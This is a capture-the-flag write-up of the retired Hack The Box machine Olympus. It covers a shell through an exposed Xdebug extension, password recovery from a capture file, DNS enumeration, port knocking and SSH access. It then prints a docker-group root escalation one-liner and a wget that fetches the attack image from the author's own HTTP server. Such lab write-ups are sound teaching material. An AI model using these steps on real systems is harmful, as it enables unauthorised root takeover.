This is a write-up for the recently retired Olympus machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.

TL;DR: XDebug Shell & Docker Privesc. | At the time of writing, Olympus has been my favourite box on the platform. This is because there were separate stages within User and Root, which added more of a challenge to the system. Also, at each stage, we were given a small hint so that we had a very rough idea of what exactly to look into, whilst also not being given too much.

PART ONE: USER

Let’s begin with an nmap scan. As with many other commands in this post, you can click on them to view a page outlining their syntax.

We are immediately given quite a lot of information, but the only crucial parts of this are the 4 open ports: 22 (SSH), 53 (DNS), 80 (HTTP) & 2222 (SSH). Since the SSH versions look fairly recent, let’s take a look at the webpage.

We are shown nothing other than an image.

It doesn’t look as if there’s much information to be found here. I also checked the source code for any clues, but there was very little there. Seeing as we don’t have much to work from, I then tried a dirb scan:

Before long, I found these three files, but they were all useless (other than index.php, which reveals that the server runs PHP). After spending some more time enumerating, I decided to take a look at a simple request in Burp, to exactly what is sent to us by the server:

Our request is on the left, and the server response is on the right.

We can see here that there’s a slightly unusual header in the response: “Xdebug”. I then spent some time looking into this, and discovered that it’s a PHP extension that allows for more simplistic debugging during the development stages of a website. Simply searching for related exploits brought me to this, which is a script that should give us a shell through Xdebug. I saved the script to my system and tested it out:

The syntax of this script is outlined on its github page.

After enumerating the file system for a bit, I found the following (Note: “cd” doesn’t work with this script):

>> ls /home zeus >> ls /home/zeus airgeddon >> ls /home/zeus/airgeddon CHANGELOG.md CODE_OF_CONDUCT.md CONTRIBUTING.md Dockerfile LICENSE.md README.md airgeddon.sh binaries captured imgs known_pins.db language_strings.sh pindb_checksum.txt >> ls /home/zeus/airgeddon/captured captured.cap papyrus.txt >>

Let’s now take a look at these files…

>> cat /home/zeus/airgeddon/captured/papyrus.txt Captured while flying. I'll banish him to Olympia – Zeus >> cat /home/zeus/airgeddon/captured/captured.cap >>

It looks like we can’t directly read this, so let’s copy it over to our local machine by Base64 encoding the file:

Now all we have to do (on our local machine) is decode this and store the output into a new file. With this file now decoded, we can inspect it with tcpdump:

As shown, the string “Too_cl0se_to_th3_Sun” looks very much like a password, and so I figured that it was time to try and SSH in. I spent some time looking for a possible username to use, but it turns out that we just had to guess it from the contents of papyrus.txt. As the clue suggests, the user is Icarus. We also have to use the SSH port 2222, since port 22 is filtered.

As shown in the screenshot, we still don’t quite have the user flag. Instead, we are just given another hint. Since as we are given a domain, let’s use dig to further enumerate the domains on this box:

We can now immediately see some interesting entries:

ctfolympus.htb. 86400 IN TXT “prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!”

86400 IN TXT “prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!” RhodesColossus.ctfolympus.htb. 86400 IN TXT “Here lies the great Colossus of Rhodes”

hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.

Let’s begin by looking at the first entry here. We are given what looks like a username (“prometheus”), a password (“St34l_th3_F1re!”) and some interesting numbers. Since the text says that we must “open a temporal portal”, we can infer that we must use these numbers in order to open a service. Essentially, this all points to port knocking.

In order to do this, we’ve initially got to install knockd, and then use it like so:

Terminal 1: An initial nmap scan — Port 22 is filtered.

Terminal 2: We perform the port knocking.

Terminal 3: A second nmap scan — Port 22 has opened!

Now that this port is open, let’s SSH in with the credentials supplied earlier:

We have the user flag!

I’ve been told that this wasn’t actually the intended route, and that there was supposed to be another stage in between the two users. But if it works, it works.

PART TWO: ROOT

Let’s take a look inside the home directory:

“Only if you serve well to the gods, you’ll be able to enter into the olympus”.

At the moment, it doesn’t seem like this tip is very useful. Whilst doing some enumeration on my user, I ran groups, which had the following output:

prometheus@olympus:~$ groups prometheus cdrom floppy audio dip video plugdev netdev bluetooth docker

Whilst enumerating a different box, I had followed a rabbit hole and accidentally learnt a lot about docker privilege escalation, which simply requires the user to be in the docker group to perform. Because of this, the docker group immediately peaked my interest.

A Google search reveals a good POC by Chris Foster, in which you can pull off the privesc in one command:

> docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

Let’s try using docker to pull the chrisfosterelli/rootplease container:

This command should download/install the specified container.

As with all HTB boxes, we don’t have access to the internet. Instead, (as the hint suggests), we’ve got to serve it over to the box. In order to do this, I first ran pulled rootplease to my local machine, saved it, served it over via a Python HTTP server, and then loaded it on the box. If you need help configuring docker in kali, just follow this tutorial.

I’ll run through the commands that I used here:

[local] >> sudo service docker start [local] >> sudo docker pull chrisfosterelli/rootplease [local] >> sudo docker save -o rootplease.tar chrisfosterelli/rootplease [local] >> python -m SimpleHTTPServer 5555 olympus] >> wget ] >> wget http://10.10.15.243:5555/rootplease.tar (This may take some time.) [olypmus] >> docker load -i rootplease.tar

With that now loaded, let’s try running the command mentioned earlier:

Now that we are root, we can read flag.